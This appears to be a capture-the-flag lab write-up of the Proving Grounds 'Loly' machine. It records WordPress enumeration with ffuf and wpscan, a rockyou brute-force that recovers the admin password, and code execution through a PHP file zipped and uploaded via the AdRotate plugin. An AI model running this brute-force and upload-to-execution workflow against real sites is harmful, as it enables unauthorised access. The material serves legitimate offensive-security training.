Web
Nmap discovered a Web server on the target port 80
The running service is nginx 1.10.3 (Ubuntu)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ curl -I -X OPTIONS http://$IP/
HTTP/1.1 405 Not Allowed
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 27 Apr 2025 13:51:56 GMT
Content-Type: text/html
Content-Length: 182
Connection: keep-alive
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ curl -I http://$IP/
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 27 Apr 2025 13:51:58 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Wed, 19 Aug 2020 09:25:24 GMT
Connection: keep-alive
ETag: "5f3cf004-264"
Accept-Ranges: bytes/Play/Loly/2-Enumeration/attachments/{C291B2D0-76B2-41EB-9678-E25D9C8C5081}.png)
Webroot
It’s the default Nginx installation page
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php -fc 403
________________________________________________
:: Method : GET
:: URL : http://192.168.120.121/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
wordpress [Status: 301, Size: 194, Words: 7, Lines: 8, Duration: 25ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1470 req/sec :: Duration: [0:00:56] :: Errors: 0 ::
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP/FUZZ/ -ic -fc 403
________________________________________________
:: Method : GET
:: URL : http://192.168.120.121/FUZZ/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
[Status: 200, Size: 612, Words: 79, Lines: 26, Duration: 27ms]
wordpress [Status: 200, Size: 28194, Words: 5011, Lines: 497, Duration: 494ms]
:: Progress: [207630/207630] :: Job [1/1] :: 1550 req/sec :: Duration: [0:02:17] :: Errors: 0 ::/wordpress
/wordpress
/Play/Loly/2-Enumeration/attachments/Pasted-image-20250427155459.png)
The /wordpress endpoint indeed hosts a WordPress instance
/Play/Loly/2-Enumeration/attachments/{CE683E3D-7C53-44FA-92D8-651410A7BD9B}.png)
CSS is not loaded as it looks for it in a domain; loly.lc
/Play/Loly/2-Enumeration/attachments/{F1001DBD-3349-4CA4-8773-FBDD7A5B4BD0}.png)
The domain information has been appended to the /etc/hosts file on Kali for local DNS resolution
/Play/Loly/2-Enumeration/attachments/{288129F9-F494-4091-AB7D-98F0127F417B}.png)
CSS is now loaded
wpscan
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ wpscan --url http://loly.lc/wordpress --random-user-agent -e u,ap,at --plugins-detection aggressive -t 128
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://loly.lc/wordpress/ [192.168.120.121]
[+] Started: Sun Apr 27 16:05:51 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://loly.lc/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://loly.lc/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://loly.lc/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Rss Generator (Passive Detection)
| - http://loly.lc/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.5</generator>
| Confirmed By: Emoji Settings (Passive Detection)
| - http://loly.lc/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'
[+] WordPress theme in use: feminine-style
| Location: http://loly.lc/wordpress/wp-content/themes/feminine-style/
| Last Updated: 2025-04-21T00:00:00.000Z
| Readme: http://loly.lc/wordpress/wp-content/themes/feminine-style/readme.txt
| [!] The version is out of date, the latest version is 3.0.6
| Style URL: http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css?ver=5.5
| Style Name: Feminine Style
| Style URI: https://www.acmethemes.com/themes/feminine-style
| Description: Feminine Style is a voguish, dazzling and very appealing WordPress theme. The theme is completely wo...
| Author: acmethemes
| Author URI: https://www.acmethemes.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css?ver=5.5, Match: 'Version: 1.0.0'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:01:20 <==================================================> (110222 / 110222) 100.00% Time: 00:01:20
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] adrotate
| Location: http://loly.lc/wordpress/wp-content/plugins/adrotate/
| Last Updated: 2025-03-18T21:03:00.000Z
| Readme: http://loly.lc/wordpress/wp-content/plugins/adrotate/readme.txt
| [!] The version is out of date, the latest version is 5.13.7
|
| Found By: Known Locations (Aggressive Detection)
| - http://loly.lc/wordpress/wp-content/plugins/adrotate/, status: 200
|
| Version: 5.8.6.2 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://loly.lc/wordpress/wp-content/plugins/adrotate/readme.txt
[+] akismet
| Location: http://loly.lc/wordpress/wp-content/plugins/akismet/
| Last Updated: 2025-04-14T23:37:00.000Z
| Readme: http://loly.lc/wordpress/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.7
|
| Found By: Known Locations (Aggressive Detection)
| - http://loly.lc/wordpress/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.6 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://loly.lc/wordpress/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://loly.lc/wordpress/wp-content/plugins/akismet/readme.txt
[+] Enumerating All Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:25 <====================================================> (29470 / 29470) 100.00% Time: 00:00:25
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] Theme(s) Identified:
[+] feminine-style
| Location: http://loly.lc/wordpress/wp-content/themes/feminine-style/
| Last Updated: 2025-04-21T00:00:00.000Z
| Readme: http://loly.lc/wordpress/wp-content/themes/feminine-style/readme.txt
| [!] The version is out of date, the latest version is 3.0.6
| Style URL: http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css
| Style Name: Feminine Style
| Style URI: https://www.acmethemes.com/themes/feminine-style
| Description: Feminine Style is a voguish, dazzling and very appealing WordPress theme. The theme is completely wo...
| Author: acmethemes
| Author URI: https://www.acmethemes.com/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Known Locations (Aggressive Detection)
| - http://loly.lc/wordpress/wp-content/themes/feminine-style/, status: 500
|
| Version: 1.0.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css, Match: 'Version: 1.0.0'
[+] twentynineteen
| Location: http://loly.lc/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2025-04-15T00:00:00.000Z
| Readme: http://loly.lc/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://loly.lc/wordpress/wp-content/themes/twentynineteen/style.css
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://loly.lc/wordpress/wp-content/themes/twentynineteen/, status: 500
|
| Version: 1.7 (80% confidence)
| Found By: Style (Passive Detection)
| - http://loly.lc/wordpress/wp-content/themes/twentynineteen/style.css, Match: 'Version: 1.7'
[+] twentyseventeen
| Location: http://loly.lc/wordpress/wp-content/themes/twentyseventeen/
| Last Updated: 2025-04-15T00:00:00.000Z
| Readme: http://loly.lc/wordpress/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.9
| Style URL: http://loly.lc/wordpress/wp-content/themes/twentyseventeen/style.css
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://loly.lc/wordpress/wp-content/themes/twentyseventeen/, status: 500
|
| Version: 2.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://loly.lc/wordpress/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 2.4'
[+] twentytwenty
| Location: http://loly.lc/wordpress/wp-content/themes/twentytwenty/
| Last Updated: 2025-04-15T00:00:00.000Z
| Readme: http://loly.lc/wordpress/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://loly.lc/wordpress/wp-content/themes/twentytwenty/style.css
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://loly.lc/wordpress/wp-content/themes/twentytwenty/, status: 500
|
| Version: 1.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://loly.lc/wordpress/wp-content/themes/twentytwenty/style.css, Match: 'Version: 1.5'
[+] virtue
| Location: http://loly.lc/wordpress/wp-content/themes/virtue/
| Last Updated: 2025-04-03T00:00:00.000Z
| Readme: http://loly.lc/wordpress/wp-content/themes/virtue/readme.txt
| [!] The version is out of date, the latest version is 3.4.12
| Style URL: http://loly.lc/wordpress/wp-content/themes/virtue/style.css
| Style Name: Virtue
| Style URI: https://kadencewp.com/product/virtue-free-theme/
| Description: The Virtue theme is extremely versatile with tons of options, easy to customize and loaded with grea...
| Author: Kadence WP
| Author URI: https://kadencewp.com/
|
| Found By: Known Locations (Aggressive Detection)
| - http://loly.lc/wordpress/wp-content/themes/virtue/, status: 200
|
| Version: 3.4.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://loly.lc/wordpress/wp-content/themes/virtue/style.css, Match: 'Version: 3.4.2'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <==========================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] loly
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] A WordPress Commenter
| Found By: Rss Generator (Passive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Apr 27 16:08:02 2025
[+] Requests Done: 139770
[+] Cached Requests: 26
[+] Data Sent: 38.065 MB
[+] Data Received: 23.085 MB
[+] Memory used: 445.141 MB
[+] Elapsed time: 00:02:10A user identified; loly
Brute-Force Attack
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ wpscan --url http://loly.lc/wordpress --random-user-agent -U loly -P /usr/share/wordlists/rockyou.txt -t 128
[...REDACTED...]
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando
Trying loly / andres Time: 00:00:02 < > (256 / 14344648) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: loly, Password: fernando
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Apr 27 16:20:39 2025
[+] Requests Done: 430
[+] Cached Requests: 5
[+] Data Sent: 204.062 KB
[+] Data Received: 532.291 KB
[+] Memory used: 285.855 MB
[+] Elapsed time: 00:00:15Brute-force attack successfully; loly:fernando
wp-admin
/Play/Loly/2-Enumeration/attachments/Pasted-image-20250427162355.png)
/Play/Loly/2-Enumeration/attachments/{FFD20A66-A8A8-4B8C-B280-059C525225E0}.png)
Successfully authenticated.
Once admin access is grant to a WordPress instance, there are many ways to get code execution on the host system, such as installing a malicious plugin, or editing a theme.
/Play/Loly/3-Exploitation/attachments/{0583B82D-F139-46DE-B237-D4592B809A85}.png)
/Play/Loly/3-Exploitation/attachments/{F1FB3536-0E44-40F1-B7E9-32FEF7F19639}.png)
However, both installing a malicious plugin and editing theme appear to be disable
/Play/Loly/3-Exploitation/attachments/{32113049-1D7D-483D-ADA2-D48C750B8388}.png)
The AdRotate plugin really stands out. I’ll look more into this.
AdRotate
/Play/Loly/3-Exploitation/attachments/{1C8D2508-3168-43A1-A8A9-7C601CAD265B}.png)
The version is 5.8.6.2
/Play/Loly/2-Enumeration/attachments/{3AA41A7C-3151-4C9E-BB0D-12590D0F531D}.png)
It seems to support media handling.
It might be possible to upload file through this feature
adrotate-media
/Play/Loly/2-Enumeration/attachments/Pasted-image-20250427165647.png)
As expected the adrotate-media feature supports file upload
While there is an extension filter, it also supports the .zip extension and it gets automatically extracted to the uploaded location.
The uploaded location would supposedly be /banners
Testing
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ cat test.php
<?php phpinfo(); ?>
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ zip test.zip test.php
adding: test.php (stored 0%)Creating a ZIP archive with a PHP file
/Play/Loly/2-Enumeration/attachments/Pasted-image-20250427170018.png)
/Play/Loly/2-Enumeration/attachments/{6F7A21AF-A93D-4F61-99F1-0440E978F3F2}.png)
Uploaded
/Play/Loly/2-Enumeration/attachments/{076BD871-4729-4614-A4DE-839724F582EB}.png)
While there is nothing showing up, it might be due to detecting only image files
I would have to locate the /banners directory manually.
/Play/Loly/2-Enumeration/attachments/Pasted-image-20250427170213.png)
Located through the Settings tab
/Play/Loly/2-Enumeration/attachments/{81AF8BA0-CB72-438F-A019-5A33E80713AB}.png)
Uploaded file identified; /wp-content/banners/test.php
Code execution confirmed
Moving on to the Exploitation phase
Vulnerabilities
/Play/Loly/2-Enumeration/attachments/{5FD18CE6-3079-469D-8AC4-6F321DFC4530}.png)
Looking it up online reveals a vulnerability affecting AdRotate below 5.8.3; CVE-2022-0267
Virtual Host / Sub-domain Discovery
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$IP/wordpress/ -H 'Host: FUZZ.loly.lc' -ic -mc all -fs 28194
________________________________________________
:: Method : GET
:: URL : http://192.168.120.121/wordpress/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.loly.lc
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 28194
________________________________________________
www [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 53ms]
:: Progress: [114437/114437] :: Job [1/1] :: 84 req/sec :: Duration: [0:21:53] :: Errors: 0 ::N/A